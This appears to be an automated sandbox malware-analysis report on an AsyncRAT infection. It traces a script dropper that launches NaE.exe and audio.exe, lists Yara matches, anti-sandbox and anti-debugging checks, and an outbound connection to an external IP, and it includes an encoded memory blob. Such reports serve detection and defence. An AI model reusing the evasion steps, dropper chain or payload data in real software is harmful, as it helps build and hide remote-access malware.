                        Source: C:\Users\user\AppData\Local\Temp\audio.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\audio.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\audio.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\audio.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\audio.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\audio.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\audio.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\audio.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\audio.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\audio.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\audio.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\audio.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                        Malware Analysis System Evasion

                        barindex
                        Yara detected AsyncRAT
                        Source: Yara matchFile source: 10.3.audio.exe.73ed50.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 10.2.audio.exe.3505f90.7.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 4.2.NaE.exe.3485f90.5.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 8.2.audio.exe.26a0000.5.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 4.2.NaE.exe.3485f90.5.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 10.2.audio.exe.2310000.4.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 12.2.audio.exe.21023f6.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 10.2.audio.exe.34e6478.6.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 10.2.audio.exe.21e23f6.2.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 12.2.audio.exe.4a60000.6.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 8.2.audio.exe.26a0000.5.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 10.3.audio.exe.73ed50.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 4.2.NaE.exe.21214ee.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 10.2.audio.exe.34e5570.5.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 4.2.NaE.exe.21223f6.2.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 8.2.audio.exe.2620f08.4.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 10.2.audio.exe.50b0000.8.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 4.2.NaE.exe.3466478.7.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 4.2.NaE.exe.22d0000.4.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 12.2.audio.exe.35e5570.5.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 8.2.audio.exe.3715f90.7.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 12.2.audio.exe.21023f6.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 8.2.audio.exe.36f6478.6.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 8.2.audio.exe.36f5570.8.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 4.2.NaE.exe.22d0f08.3.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 10.2.audio.exe.34e6478.6.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 8.2.audio.exe.36f5570.8.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 12.2.audio.exe.4a60f08.7.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 4.2.NaE.exe.22d0000.4.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 8.2.audio.exe.36f6478.6.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 4.2.NaE.exe.50c0000.9.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 12.2.audio.exe.35e5570.5.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 12.2.audio.exe.50c0000.8.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 10.2.audio.exe.2310f08.3.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 8.2.audio.exe.21623f6.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 4.3.NaE.exe.782700.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 4.2.NaE.exe.3465570.8.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 8.2.audio.exe.2620f08.4.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 4.3.NaE.exe.782700.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 4.2.NaE.exe.21223f6.2.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 8.2.audio.exe.3715f90.7.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 8.3.audio.exe.6dfc80.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 10.2.audio.exe.34e5570.5.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 12.2.audio.exe.4a60f08.7.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 12.2.audio.exe.4a60000.6.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 10.2.audio.exe.21e14ee.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 12.2.audio.exe.50c0000.8.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 12.2.audio.exe.3605f90.4.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 8.2.audio.exe.21623f6.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 8.2.audio.exe.21614ee.2.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 4.2.NaE.exe.3465570.8.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 10.2.audio.exe.3505f90.7.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 10.2.audio.exe.50b0000.8.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 12.2.audio.exe.3605f90.4.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 10.2.audio.exe.21e23f6.2.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 4.2.NaE.exe.22d0f08.3.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 12.2.audio.exe.21014ee.2.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 8.2.audio.exe.21614ee.2.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 10.2.audio.exe.21e14ee.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 4.2.NaE.exe.21214ee.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 12.2.audio.exe.35e6478.3.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 10.2.audio.exe.2310f08.3.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 12.2.audio.exe.35e6478.3.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 4.2.NaE.exe.3466478.7.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 8.2.audio.exe.2620000.3.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 8.2.audio.exe.2620000.3.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 8.3.audio.exe.6dfc80.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 12.2.audio.exe.21014ee.2.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 10.2.audio.exe.2310000.4.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 4.2.NaE.exe.50c0000.9.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0000000C.00000002.1704070418.0000000004A60000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000008.00000002.2646725943.0000000002620000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000008.00000002.2647263309.00000000036F5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000004.00000002.1461979166.00000000050C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000A.00000003.1556222690.000000000073E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000004.00000003.1401870654.0000000000782000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000C.00000002.1704215181.00000000050C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000C.00000003.1633955977.00000000005F1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000004.00000002.1461555095.0000000003465000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000C.00000002.1703974284.00000000035E5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000008.00000002.2646294834.0000000002121000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000008.00000002.2646894853.00000000026F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000A.00000002.1605649844.0000000002310000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000004.00000002.1460269498.00000000022D0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000A.00000002.1606710078.00000000050B0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000008.00000003.1485055464.00000000006DF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000008.00000002.2646838997.00000000026A0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000C.00000002.1703024609.00000000020C1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000A.00000002.1605576072.00000000021A1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000A.00000002.1606447047.00000000034E5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000004.00000002.1460450489.0000000002461000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000004.00000002.1459773527.00000000020E1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000C.00000002.1703663074.00000000025E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000A.00000002.1606012151.00000000024E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: NaE.exe PID: 7716, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: audio.exe PID: 7888, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: audio.exe PID: 8088, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: audio.exe PID: 568, type: MEMORYSTR
                        Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                        Source: NaE.exe, 00000004.00000002.1460450489.0000000002461000.00000004.00000800.00020000.00000000.sdmp, audio.exe, 00000008.00000002.2646894853.00000000026F1000.00000004.00000800.00020000.00000000.sdmp, audio.exe, 0000000A.00000002.1606012151.00000000024E1000.00000004.00000800.00020000.00000000.sdmp, audio.exe, 0000000C.00000002.1703663074.00000000025E1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
                        Source: C:\Users\user\AppData\Local\Temp\NaE.exeMemory allocated: 2210000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NaE.exeMemory allocated: 2460000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NaE.exeMemory allocated: 4460000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\audio.exeMemory allocated: 2220000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\audio.exeMemory allocated: 26F0000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\audio.exeMemory allocated: 23B0000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\audio.exeMemory allocated: 670000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\audio.exeMemory allocated: 24E0000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\audio.exeMemory allocated: 44E0000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\audio.exeMemory allocated: 2220000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\audio.exeMemory allocated: 25E0000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\audio.exeMemory allocated: 23F0000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NaE.exeCode function: 4_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,FindCloseChangeNotification,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,KiUserExceptionDispatcher,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear,4_2_004019F0
                        Source: C:\Users\user\AppData\Local\Temp\NaE.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\audio.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\audio.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                        Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NaE.exe TID: 7736Thread sleep time: -922337203685477s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\audio.exe TID: 8112Thread sleep time: -922337203685477s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\audio.exe TID: 7308Thread sleep time: -922337203685477s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NaE.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\audio.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\audio.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\audio.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NaE.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\audio.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\audio.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\userJump to behavior
                        Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppDataJump to behavior
                        Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Local\TempJump to behavior
                        Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\Desktop\desktop.iniJump to behavior
                        Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
                        Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\Documents\desktop.iniJump to behavior
                        Source: wscript.exe, 00000000.00000003.1397649954.0000015E7FF00000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 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
                        Source: audio.exe, 0000000C.00000002.1703663074.00000000025E1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmware
                        Source: audio.exe, 00000008.00000002.2645719105.0000000000784000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllN
                        Source: wscript.exe, 00000003.00000002.1404205664.0000027D83540000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: -b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}%
                        Source: wscript.exe, 00000000.00000003.1398114001.0000015E7F9EC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1401872911.0000015E7F9EC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1401426201.0000015E7F9A0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                        Source: wscript.exe, 00000003.00000003.1400060291.0000027D83540000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: -b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}{F
                        Source: C:\Users\user\AppData\Local\Temp\NaE.exeProcess information queried: ProcessInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NaE.exeCode function: 4_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,4_2_0040CE09
                        Source: C:\Users\user\AppData\Local\Temp\NaE.exeCode function: 4_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,FindCloseChangeNotification,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,KiUserExceptionDispatcher,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear,4_2_004019F0
                        Source: C:\Users\user\AppData\Local\Temp\NaE.exeCode function: 4_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,FindCloseChangeNotification,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,KiUserExceptionDispatcher,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear,4_2_004019F0
                        Source: C:\Users\user\AppData\Local\Temp\NaE.exeCode function: 4_2_0040ADB0 GetProcessHeap,HeapFree,4_2_0040ADB0
                        Source: C:\Users\user\AppData\Local\Temp\NaE.exeCode function: 4_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,4_2_0040CE09
                        Source: C:\Users\user\AppData\Local\Temp\NaE.exeCode function: 4_2_0040E61C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,4_2_0040E61C
                        Source: C:\Users\user\AppData\Local\Temp\NaE.exeCode function: 4_2_00416F6A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_00416F6A
                        Source: C:\Users\user\AppData\Local\Temp\NaE.exeCode function: 4_2_004123F1 SetUnhandledExceptionFilter,4_2_004123F1
                        Source: C:\Users\user\AppData\Local\Temp\NaE.exeMemory allocated: page read and write | page guardJump to behavior

                        HIPS / PFW / Operating System Protection Evasion

                        barindex
                        Benign windows process drops PE files
                        Source: C:\Windows\System32\wscript.exeFile created: NaE.exe.3.drJump to dropped file
                        System process connects to network (likely due to code injection or exploit)
                        Source: C:\Windows\System32\wscript.exeNetwork Connect: 51.254.27.105 443Jump to behavior
                        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\IDWYPJ.js" Jump to behavior
                        Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\Temp\NaE.exe "C:\Users\user\AppData\Local\Temp\NaE.exe" Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NaE.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmpAB92.tmp.bat""Jump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout 3Jump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\audio.exe "C:\Users\user\AppData\Local\Temp\audio.exe" Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NaE.exeCode function: GetLocaleInfoA,4_2_00417A20
                        Source: C:\Users\user\AppData\Local\Temp\NaE.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NaE.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\audio.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\audio.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\audio.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\audio.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NaE.exeCode function: 4_2_00412A15 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,4_2_00412A15
                        Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                        Lowering of HIPS / PFW / Operating System Security Settings

                        barindex
                        Yara detected AsyncRAT
